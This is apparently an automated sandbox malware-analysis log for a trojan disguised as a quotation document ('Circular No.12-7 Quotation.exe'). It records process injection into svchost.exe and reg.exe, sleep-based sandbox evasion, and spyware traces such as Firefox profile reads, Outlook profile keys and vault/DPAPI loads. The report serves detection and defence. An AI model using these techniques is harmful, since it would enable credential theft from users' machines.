                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A259903_2_03A25990
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AB59103_2_03AB5910
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A299503_2_03A29950
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A3B9503_2_03A3B950
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A238E03_2_03A238E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A8D8003_2_03A8D800
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADFFB13_2_03ADFFB1
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A21F923_2_03A21F92
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADFF093_2_03ADFF09
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A29EB03_2_03A29EB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A3FDC03_2_03A3FDC0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD7D733_2_03AD7D73
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD1D5A3_2_03AD1D5A
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A99C323_2_03A99C32
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032C1D703_2_032C1D70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032C36003_2_032C3600
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032C35FB3_2_032C35FB
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032C54003_2_032C5400
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032DBAD03_2_032DBAD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032BAFA03_2_032BAFA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032BAF943_2_032BAF94
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032BCE603_2_032BCE60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032BAE503_2_032BAE50
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032BCC373_2_032BCC37
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032BCC403_2_032BCC40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_038EE2F43_2_038EE2F4
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_038EE7AC3_2_038EE7AC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_038EE4133_2_038EE413
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_038ED8783_2_038ED878
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 53 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 98 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 76 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 210 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 93 times
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: String function: 00C17DE1 appears 36 times
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: String function: 00C30AE3 appears 70 times
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: String function: 00C38900 appears 36 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 03A8EA12 appears 76 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 03A0B970 appears 210 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 03A67E54 appears 93 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 03A55130 appears 53 times
                Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 03A9F290 appears 98 times
                Source: Circular No.12-7 Quotation.exe, 00000000.00000003.963478636.00000000036BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Circular No.12-7 Quotation.exe
                Source: Circular No.12-7 Quotation.exe, 00000000.00000003.964069543.0000000003513000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Circular No.12-7 Quotation.exe
                Source: Circular No.12-7 Quotation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/12
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7A06A GetLastError,FormatMessageW,0_2_00C7A06A
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C681CB AdjustTokenPrivileges,CloseHandle,0_2_00C681CB
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C687E1
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C7B3FB
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C8EE0D
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C7C397
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C14E89
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\aut6216.tmpJump to behavior
                Source: Circular No.12-7 Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: reg.exe, 00000003.00000003.1289623848.000000000355B000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1287119729.0000000003550000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000002.3410869469.000000000357D000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000002.3410869469.0000000003550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Circular No.12-7 Quotation.exeReversingLabs: Detection: 60%
                Source: Circular No.12-7 Quotation.exeVirustotal: Detection: 43%
                Source: unknownProcess created: C:\Users\user\Desktop\Circular No.12-7 Quotation.exe "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe"
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe"
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
                Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Circular No.12-7 Quotation.exe"Jump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Circular No.12-7 Quotation.exeStatic file information: File size 1209856 > 1048576
                Source: Circular No.12-7 Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Circular No.12-7 Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Circular No.12-7 Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Circular No.12-7 Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Circular No.12-7 Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Circular No.12-7 Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Circular No.12-7 Quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: Circular No.12-7 Quotation.exe, 00000000.00000003.964572948.0000000003590000.00000004.00001000.00020000.00000000.sdmp, Circular No.12-7 Quotation.exe, 00000000.00000003.964466960.00000000033F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.998556542.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1100441787.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1000427179.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1100441787.000000000379E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000003.00000002.3412602500.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1100545587.000000000364F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1103640377.0000000003839000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000002.3412602500.00000000039E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Circular No.12-7 Quotation.exe, 00000000.00000003.964572948.0000000003590000.00000004.00001000.00020000.00000000.sdmp, Circular No.12-7 Quotation.exe, 00000000.00000003.964466960.00000000033F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.998556542.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1100441787.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1000427179.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1100441787.000000000379E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, reg.exe, 00000003.00000002.3412602500.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1100545587.000000000364F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000003.1103640377.0000000003839000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000003.00000002.3412602500.00000000039E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: reg.pdb source: svchost.exe, 00000001.00000003.1068669592.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1068566769.000000000301A000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000003.1037912153.0000000000F94000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3411794169.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: reg.exe, 00000003.00000002.3413365532.000000000400C000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3410869469.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1398982673.000000003A1BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: reg.exe, 00000003.00000002.3413365532.000000000400C000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3410869469.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1398982673.000000003A1BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: reg.pdbGCTL source: svchost.exe, 00000001.00000003.1068669592.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1068566769.000000000301A000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000003.1037912153.0000000000F94000.00000004.00000020.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3411794169.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 3kdbs1NJMiXeHlFl.exe, 00000002.00000002.3410489291.00000000003DF000.00000002.00000001.01000000.00000004.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3410487822.00000000003DF000.00000002.00000001.01000000.00000004.sdmp
                Source: Circular No.12-7 Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Circular No.12-7 Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Circular No.12-7 Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Circular No.12-7 Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Circular No.12-7 Quotation.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,0_2_00C14B37
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7848F push FFFFFF8Bh; iretd 0_2_00C78491
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C306FE push es; ret 0_2_00C3070B
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3070E push es; ret 0_2_00C3070F
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C30710 push es; ret 0_2_00C3071B
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C30720 push es; ret 0_2_00C30723
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C30724 push es; ret 0_2_00C30727
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3072A push es; ret 0_2_00C30733
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C30734 push es; ret 0_2_00C30737
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C30739 push es; ret 0_2_00C30753
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C38945 push ecx; ret 0_2_00C38958
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C32BDC push ds; ret 0_2_00C32BE2
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C253ED push edx; retn 0000h0_2_00C253EE
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00E5F089 push FFFFFFA6h; iretd 0_2_00E5F823
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00E5F825 push FFFFFFECh; iretd 0_2_00E5F9D3
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00E5FAA8 push 00000009h; iretd 0_2_00E5FAAB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00419140 pushfd ; retf 1_2_00419143
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A951 push ebx; ret 1_2_0041A952
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414A08 push ss; retf 1_2_00414A0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004192A7 push edi; retf 1_2_004192A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AB7E push esi; iretd 1_2_0040AB8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004033E0 push eax; ret 1_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AB83 push esi; iretd 1_2_0040AB8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414428 push esi; ret 1_2_0041442D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401500 push esp; retf D8DFh1_2_00401596
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418D0C push edi; ret 1_2_00418D1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418D13 push edi; ret 1_2_00418D1C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E1B push ds; ret 1_2_00411E23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E2A pushfd ; ret 1_2_00401E55
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417ED3 push edi; ret 1_2_00417EDF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004016E2 push esp; iretd 1_2_004016E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401697 pushfd ; ret 1_2_004016D5
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C95376
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C33187
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeAPI/Special instruction interceptor: Address: E63114
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFA424ED324
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFA424ED7E4
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFA424ED944
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFA424ED504
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFA424ED544
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFA424ED1E4
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFA424F0154
                Source: C:\Windows\SysWOW64\reg.exeAPI/Special instruction interceptor: Address: 7FFA424EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037021AE rdtsc 1_2_037021AE
                Source: C:\Windows\SysWOW64\reg.exeWindow / User API: threadDelayed 9833Jump to behavior
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeAPI coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\reg.exeAPI coverage: 3.0 %
                Source: C:\Windows\SysWOW64\reg.exe TID: 1716Thread sleep count: 141 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exe TID: 1716Thread sleep time: -282000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\reg.exe TID: 1716Thread sleep count: 9833 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\reg.exe TID: 1716Thread sleep time: -19666000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exe TID: 2044Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exe TID: 2044Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exe TID: 2044Thread sleep time: -66000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exe TID: 2044Thread sleep count: 45 > 30Jump to behavior
                Source: C:\Program Files (x86)\WPfavkLXnStqhFievMDxJeXMpJWYABaIzVqbdIhMPJDINzEhOhIARXFyyWAbBJpEbws\3kdbs1NJMiXeHlFl.exe TID: 2044Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\reg.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7445A
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7C6D1 FindFirstFileW,FindClose,0_2_00C7C6D1
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C7C75C
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7F3F3
